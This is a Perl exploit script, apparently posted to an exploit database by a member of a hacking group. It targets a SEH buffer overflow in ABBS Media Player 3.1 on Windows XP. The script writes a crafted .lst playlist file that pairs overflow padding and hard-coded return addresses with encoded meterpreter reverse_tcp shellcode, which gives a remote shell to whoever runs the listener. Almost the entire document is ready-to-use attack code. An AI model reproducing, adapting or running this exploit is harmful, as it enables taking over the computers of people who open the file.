#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 _ __ __ __ 1
#1 /' \ __ /'__`\ /\ \__ /'__`\ 0
#0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
#1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
#0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
#1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
#0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
#1 \ \____/ >> Exploit database separated by exploit 0
#0 \/___/ type (local, remote, DoS, etc.) 1
#1 1
#0 [+] Site : 1337day.com 0
#1 [+] Support e-mail : submit[at]1337day.com 1
#0 0
#1 ######################################### 1
#0 I'm Caddy-dz member from Inj3ct0r Team 1
#1 ######################################### 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
####
# Exploit Title: ABBS Media Player 3.1 Buffer Overflow Exploit (SEH)
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia[at]hotmail.com
# Category:: Local Exploits
# software: http://abbs.qsnx.net/downloads/audio_media_player_download.html
# Tested on: VMWare Workstation [Windows Xp Sp 2 / French]
####
# Sp Greets To Owasp Algeria (Open Web Application Security Project) , KedAns-Dz , Kalashincov3 , My </3
system("title Caddy-Dz");
system("color 1a");
system("cls");
print "\n\n";
print " |=============================================================|\n";
print " |= [!] Name : ABBS Audio Media Player V 3.1 BOF Exploit (SEH)=|\n";
print " |= [!] Exploit : Buffer Overflow =|\n";
print " |= [!] Author : Caddy-Dz =|\n";
print " |= [!] Mail: islam_babia[at]hotmail.com =|\n";
print " |= [!] FB Page: http://www.facebook.com/Algerian.Cyber.Army =|\n";
print " |=============================================================|\n";
sleep(2);
print "\n";
my $file = "Caddy.lst";
my $bof = "\x41" x 2112;
my $eip = pack('V', 0x7C9D2643) ; # 7C9D2643 FFE4 JMP ESP shell32.dll
my $bof2 = "\x42" x 1996;
my $next_seh = "\xeb\x06\x90\x90";
my $seh = pack('V', 0x7CA050CD); #7CA050CD 5F POP EDI
my $bof3 = "\x90" x 12;
my $shellcode =
# meterpreter/reverse_tcp
# x86/shikata_ga_nai succeeded with size 317 (iteration=1)
"\xbe\xf0\x46\x75\x13\xdd\xc3\xd9\x74\x24\xf4\x5f\x33\xc9\xb1".
"\x49\x31\x77\x14\x03\x77\x14\x83\xef\xfc\x12\xb3\x89\xfb\x5b".
"\x3c\x72\xfc\x3b\xb4\x97\xcd\x69\xa2\xdc\x7c\xbd\xa0\xb1\x8c".
"\x36\xe4\x21\x06\x3a\x21\x45\xaf\xf0\x17\x68\x30\x35\x98\x26".
"\xf2\x54\x64\x35\x27\xb6\x55\xf6\x3a\xb7\x92\xeb\xb5\xe5\x4b".
"\x67\x67\x19\xff\x35\xb4\x18\x2f\x32\x84\x62\x4a\x85\x71\xd8".
"\x55\xd6\x2a\x57\x1d\xce\x41\x3f\xbe\xef\x86\x5c\x82\xa6\xa3".
"\x96\x70\x39\x62\xe7\x79\x0b\x4a\xab\x47\xa3\x47\xb2\x80\x04".
"\xb8\xc1\xfa\x76\x45\xd1\x38\x04\x91\x54\xdd\xae\x52\xce\x05".
"\x4e\xb6\x88\xce\x5c\x73\xdf\x89\x40\x82\x0c\xa2\x7d\x0f\xb3".
"\x65\xf4\x4b\x97\xa1\x5c\x0f\xb6\xf0\x38\xfe\xc7\xe3\xe5\x5f".
"\x6d\x6f\x07\x8b\x17\x32\x40\x78\x25\xcd\x90\x16\x3e\xbe\xa2".
"\xb9\x94\x28\x8f\x32\x32\xae\xf0\x68\x82\x20\x0f\x93\xf2\x69".
"\xd4\xc7\xa2\x01\xfd\x67\x29\xd2\x02\xb2\xfd\x82\xac\x6d\xbd".
"\x72\x0d\xde\x55\x99\x82\x01\x45\xa2\x48\x2a\xef\x58\x1b\x95".
"\x47\x33\x5b\x7d\x95\xb4\x5b\x10\x10\x52\x31\xfc\x74\xcc\xae".
"\x65\xdd\x86\x4f\x69\xc8\xe2\x50\xe1\xfe\x13\x1e\x02\x8b\x07".
"\xf7\xe2\xc6\x7a\x5e\xfc\xfd\x11\x5f\x68\xf9\xb3\x08\x04\x03".
"\xe5\x7f\x8b\xfc\xc0\x0b\x02\x68\xab\x63\x6b\x7c\x2b\x74\x3d".
"\x16\x2b\x1c\x99\x42\x78\x39\xe6\x5f\xec\x92\x73\x5f\x45\x46".
"\xd3\x37\x6b\xb1\x13\x98\x94\x94\xa5\xe5\x42\xd1\x23\x1f\xe1".
"\x31\xe8";
open($File,">$file");
print $File $bof.$bof2.$eip.$next_seh.$seh.$bof3.$shellcode;
print "\n [+] File successfully created!\n" or die print "\n [-] Not Created !! ";
close($File);
